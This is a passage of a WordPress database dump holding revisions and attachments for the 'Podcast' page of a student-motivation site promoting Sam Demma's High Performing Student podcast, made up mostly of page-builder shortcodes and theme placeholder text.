google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<p style=\"text-align: center;\">The High Performing Student podcast is hosted by a 21-year-old keynote speaker and entrepreneur Sam Demma and was created to help you gain clarity and begin crafting a life that excites you. <a href=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Over 20,000 students have tuned in to date!</strong></a></p>\r\n<p style=\"text-align: center;\">In each episode, you’ll learn the small consistent actions, strategies and systems that will help you uncover your potential and ultimately become the strongest version of yourself.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column][vc_row_inner css=\".vc_custom_1603924201644{background-color: #ffffff !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Content\" text=\"There are over 100 episodes on the podcast answering questions that students sent to Sam. Each episode is from 10-60 minutes and can be found wherever you listen to your podcasts.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Action-Orientated\" text=\"Each episode has a clear call to action. Whether it\'s a three step process to overcoming your fear of public speaking, or how to negotiate with your teacher for an extension.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"2082\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1603924765880{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Community\" text=\"Since the start of the show, over 20,000 students have tuned in. Most of these students get Sam\'s exclusive emails as well: www.samdemma.com/hps\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Relatable\" text=\"Sam was a student only a few years ago. Everything he shares with you on the podcast is from lived experience, and if you\'re a student, you\'ll be able to relate to every episode.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1603929402169{padding-top: 40px !important;}\"][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2083\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/small-consistent-actions/id1450741018?mt=2\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2084\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://open.spotify.com/show/7MNKgL3Dq4RoSHKCUD3ns1\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1603929990399{padding-top: 30px !important;background-color: #000000 !important;}\"][vc_column width=\"1/4\"][vc_single_image image=\"2088\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2089\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2087\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2095\" img_size=\"full\"][/vc_column][/vc_row]','Podcast','','publish','closed','closed','','podcast','','','2020-10-29 00:08:50','2020-10-29 00:08:50','',0,'http://highperformingstudent.com/?page_id=2073',0,'page','',0),(2077,1,'2020-10-28 22:29:36','2020-10-28 22:29:36','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" darken=\"dark\" css=\".vc_custom_1603924173908{background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast \" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 22:29:36','2020-10-28 22:29:36','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2074,1,'2020-10-28 22:27:19','2020-10-28 22:27:19','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"Features With Mobile\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 22:27:19','2020-10-28 22:27:19','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2076,1,'2020-10-28 22:28:51','2020-10-28 22:28:51','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" darken=\"dark\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast \" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 22:28:51','2020-10-28 22:28:51','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2075,1,'2020-10-28 22:28:37','2020-10-28 22:28:37','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast \" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 22:28:37','2020-10-28 22:28:37','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2078,1,'2020-10-28 22:30:35','2020-10-28 22:30:35','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"custom\" darken=\"dark\" css=\".vc_custom_1603924232901{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast \" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_row_inner css=\".vc_custom_1603924201644{background-color: #ffffff !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 22:30:35','2020-10-28 22:30:35','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2079,1,'2020-10-28 22:31:10','2020-10-28 22:31:10','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"custom\" darken=\"dark\" css=\".vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast \" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_row_inner css=\".vc_custom_1603924201644{background-color: #ffffff !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 22:31:10','2020-10-28 22:31:10','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2080,1,'2020-10-29 00:07:44','2020-10-29 00:07:44','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"custom\" darken=\"dark\" css=\".vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_column_text]\n<p style=\"text-align: center;\">The High Performing Student podcast is hosted by a 21-year-old keynote speaker and entrepreneur Sam Demma and was created to help you gain clarity and begin crafting a life that excites you. <a href=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Over 20,000 students have tuned in to date!</strong></a></p>\n<p style=\"text-align: center;\">In each episode, you’ll learn the small consistent actions, strategies and systems that will help you uncover your potential and ultimately become the strongest version of yourself.</p>\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column][vc_row_inner css=\".vc_custom_1603924201644{background-color: #ffffff !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Content\" text=\"There are over 100 episodes on the podcast answering questions that students sent to Sam. Each episode is from 10-60 minutes and can be found wherever you listen to your podcasts.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Action-Orientated\" text=\"Each episode has a clear call to action. Whether it\'s a three step process to overcoming your fear of public speaking, or how to negotiate with your teacher for an extension.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"2082\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1603924765880{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Community\" text=\"Since the start of the show, over 20,000 students have tuned in. Most of these students get Sam\'s exclusive emails as well: www.samdemma.com/hps\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Relatable\" text=\"Sam was a student only a few years ago. Everything he shares with you on the podcast is from lived experience, and if you\'re a student, you\'ll be able to relate to every episode.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1603929402169{padding-top: 40px !important;}\"][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2083\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/small-consistent-actions/id1450741018?mt=2\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2084\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://open.spotify.com/show/7MNKgL3Dq4RoSHKCUD3ns1\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1603929990399{padding-top: 30px !important;background-color: #000000 !important;}\"][vc_column width=\"1/4\"][vc_single_image image=\"2088\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2089\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2087\" img_size=\"full\"][/vc_column][vc_column width=\"1/4\"][vc_single_image image=\"2095\" img_size=\"full\"][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-autosave-v1','','','2020-10-29 00:07:44','2020-10-29 00:07:44','',2073,'http://highperformingstudent.com/2020/10/28/2073-autosave-v1/',0,'revision','',0),(2081,1,'2020-10-28 22:38:23','2020-10-28 22:38:23','','Untitled design (27)','','inherit','open','closed','','untitled-design-27-3','','','2020-10-28 22:38:23','2020-10-28 22:38:23','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/Untitled-design-27-2.png',0,'attachment','image/png',0),(2082,1,'2020-10-28 22:39:21','2020-10-28 22:39:21','','Screen Shot 2020-10-28 at 6.38.58 PM','','inherit','open','closed','','screen-shot-2020-10-28-at-6-38-58-pm','','','2020-10-28 22:39:21','2020-10-28 22:39:21','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-28-at-6.38.58-PM.png',0,'attachment','image/png',0),(2083,1,'2020-10-28 23:53:05','2020-10-28 23:53:05','','apple','','inherit','open','closed','','apple','','','2020-10-28 23:53:05','2020-10-28 23:53:05','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/apple.png',0,'attachment','image/png',0),(2084,1,'2020-10-28 23:53:06','2020-10-28 23:53:06','','spotify','','inherit','open','closed','','spotify','','','2020-10-28 23:56:28','2020-10-28 23:56:28','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/spotify.png',0,'attachment','image/png',0),(2085,1,'2020-10-28 23:58:02','2020-10-28 23:58:02','[vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"custom\" darken=\"dark\" css=\".vc_custom_1603924265428{padding-bottom: 100px !important;background-color: #ffffff !important;}\"][vc_column][vc_custom_heading text=\"High Performing Student Podcast\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<p style=\"text-align: center;\">The High Performing Student podcast is hosted by a 21-year-old keynote speaker and entrepreneur Sam Demma and was created to help you gain clarity and begin crafting a life that excites you. <a href=\"https://podcasts.apple.com/ca/podcast/high-performing-student/id1450741018\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Over 20,000 students have tuned in to date!</strong></a></p>\r\n<p style=\"text-align: center;\">In each episode, you’ll learn the small consistent actions, strategies and systems that will help you uncover your potential and ultimately become the strongest version of yourself.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][vc_column][vc_row_inner css=\".vc_custom_1603924201644{background-color: #ffffff !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Content \" text=\"There are over 100 episodes on the podcast answering questions that students sent to Sam. Each episode is from 10-60 minutes and can be found wherever you listen to your podcasts.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Action-Orientated\" text=\"Each episode has a clear call to action. Whether it\'s a three step process to overcoming your fear of public speaking, or how to negotiate with your teacher for an extension.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"2082\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1603924765880{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Community\" text=\"Since the start of the show, over 20,000 students have tuned in. Most of these students get Sam\'s exclusive emails as well: www.samdemma.com/hps\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Relatable\" text=\"Sam was a student only a few years ago. Everything he shares with you on the podcast is from lived experience, and if you\'re a student, you\'ll be able to relate to every episode. \" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1603929402169{padding-top: 40px !important;}\"][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2083\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://podcasts.apple.com/ca/podcast/small-consistent-actions/id1450741018?mt=2\"][/vc_column_inner][vc_column_inner width=\"1/6\"][vc_single_image image=\"2084\" img_size=\"medium\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" link=\"https://open.spotify.com/show/7MNKgL3Dq4RoSHKCUD3ns1\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][vc_column_inner width=\"1/6\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Podcast','','inherit','closed','closed','','2073-revision-v1','','','2020-10-28 23:58:02','2020-10-28 23:58:02','',2073,'http://highperformingstudent.com/2020/10/28/2073-revision-v1/',0,'revision','',0),(2086,1,'2020-10-29 00:00:02','2020-10-29 00:00:02',' ','','','publish','closed','closed','','2086','','','2020-10-29 00:21:09','2020-10-29 00:21:09','',0,'http://highperformingstudent.com/?p=2086',5,'nav_menu_item','',0),(2087,1,'2020-10-29 00:01:20','2020-10-29 00:01:20','','testimonial 4','','inherit','open','closed','','testimonial-4','','','2020-10-29 00:01:20','2020-10-29 00:01:20','',2073,'http://highperformingstudent.com/wp-content/uploads/2020/10/testimonial-4.jpg',0,'attachment','image/jpeg',0),(2088,1,'2020-10-29 00:01:24','2020-10-29 00:01:24','','testimonial 3','','inherit','open','closed','','testimonial-3','','','2020-10-29 